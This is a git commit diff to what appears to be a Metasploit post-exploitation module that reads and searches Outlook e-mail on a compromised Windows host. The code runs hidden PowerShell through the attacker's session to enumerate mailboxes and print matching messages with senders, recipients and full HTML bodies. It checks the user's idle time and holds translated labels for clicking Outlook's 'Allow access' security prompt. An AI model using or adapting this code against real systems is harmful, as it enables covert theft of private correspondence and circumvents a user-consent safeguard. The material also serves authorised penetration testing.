Add Windows post module for reading/searching Outlook e-mail #7
parent
611e8c72eb
commit
3cadcb942a
|
@ -4,14 +4,13 @@
|
||||||
##
|
##
|
||||||
|
|
||||||
require 'msf/core'
|
require 'msf/core'
|
||||||
require 'iconv'
|
|
||||||
|
|
||||||
class Metasploit3 < Msf::Post
|
class Metasploit3 < Msf::Post
|
||||||
|
|
||||||
include Msf::Post::Windows::Registry
|
include Msf::Post::Windows::Registry
|
||||||
|
include Msf::Post::Windows::Powershell
|
||||||
|
|
||||||
A_HASH = { "en_US" => "Allow", "NL" => "Toestaan", "de_DE" => "Erteilen", "de_AT" => "Erteilen" }
|
A_HASH = { "en_US" => "Allow", "NL" => "Toestaan", "de_DE" => "Erteilen", "de_AT" => "Erteilen" }
|
||||||
ACF_HASH = { "en_US" => "Allow access for", "NL" => "Toegang geven voor", "de_DE" => "Zugriff gewähren für", "de_AT" => "Zugriff gewähren für" }
|
ACF_HASH = { "en_US" => "Allow access for", "NL" => "Toegang geven voor", "de_DE" => "Zugriff gew\xc3\xa4hren f\xc3\xbcr", "de_AT" => "Zugriff gew\xc3\xa4hren f\xc3\xbcr" }
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info={})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
|
@ -68,13 +67,11 @@ class Metasploit3 < Msf::Post
|
||||||
}
|
}
|
||||||
List-Folder
|
List-Folder
|
||||||
|
|
|
|
||||||
utf16conv = Iconv.conv('UTF16LE', 'ASCII', psh_script)
|
compressed_script = compress_script(psh_script)
|
||||||
encoded_psh = Rex::Text.encode_base64(utf16conv)
|
cmd_out, runnings_pids, open_channels = execute_script(compressed_script)
|
||||||
listBoxes_res = session.sys.process.execute("powershell.exe -enc #{encoded_psh}", nil, {'Hidden' => true, 'Channelized' => true})
|
while(d = cmd_out.channel.read)
|
||||||
sleep 3
|
print ("#{d}")
|
||||||
print listBoxes_res.channel.read
|
end
|
||||||
listBoxes_res.channel.close
|
|
||||||
listBoxes_res.close
|
|
||||||
currentidle = session.ui.idle_time
|
currentidle = session.ui.idle_time
|
||||||
print("\n")
|
print("\n")
|
||||||
print_status("System has currently been idle for #{currentidle} seconds")
|
print_status("System has currently been idle for #{currentidle} seconds")
|
||||||
|
@ -93,26 +90,23 @@ class Metasploit3 < Msf::Post
|
||||||
$Namespace = $Outlook.GetNameSpace("MAPI")
|
$Namespace = $Outlook.GetNameSpace("MAPI")
|
||||||
$account = $NameSpace.Folders
|
$account = $NameSpace.Folders
|
||||||
$count = 0
|
$count = 0
|
||||||
try {
|
|
||||||
foreach ($acc in $account) {
|
foreach ($acc in $account) {
|
||||||
$count = $count+1
|
$count = $count+1
|
||||||
|
try {
|
||||||
$Email = $NameSpace.Folders.Item($count).Folders.Item($Folder).Items
|
$Email = $NameSpace.Folders.Item($count).Folders.Item($Folder).Items
|
||||||
$Email \| Where-Object {$_.$searchObject -like '*' + $searchTerm + '*'} \| Format-List To, SenderEmailAddress, CreationTime, TaskSubject, HTMLBody
|
$Email \| Where-Object {$_.$searchObject -like '*' + $searchTerm + '*'} \| Format-List To, SenderEmailAddress, CreationTime, TaskSubject, HTMLBody
|
||||||
|
} catch {
|
||||||
|
Write-Host "Folder not found in mailbox $count"
|
||||||
}
|
}
|
||||||
} catch {
|
}
|
||||||
Write-Host "The folder does not exist in the Outlook installation. Please fill in a correct foldername."
|
|
||||||
}
|
|
||||||
}
|
}
|
||||||
Get-Emails "#{keyword}" "#{folder}" "#{searchobject}"
|
Get-Emails "#{keyword}" "#{folder}" "#{searchobject}"
|
||||||
|
|
|
|
||||||
utf16conv = Iconv.conv('UTF16LE', 'ASCII', psh_script)
|
compressed_script = compress_script(psh_script)
|
||||||
encoded_psh = Rex::Text.encode_base64(utf16conv)
|
cmd_out, runnings_pids, open_channels = execute_script(compressed_script, 120)
|
||||||
readEmails_res = session.sys.process.execute("powershell.exe -enc #{encoded_psh}", nil, {'Hidden' => true, 'Channelized' => true})
|
while(d = cmd_out.channel.read)
|
||||||
while(d = readEmails_res.channel.read)
|
|
||||||
print ("#{d}")
|
print ("#{d}")
|
||||||
end
|
end
|
||||||
readEmails_res.channel.close
|
|
||||||
readEmails_res.close
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def clickButton(atrans,acftrans)
|
def clickButton(atrans,acftrans)
|
||||||
|
|
Loading…
Reference in New Issue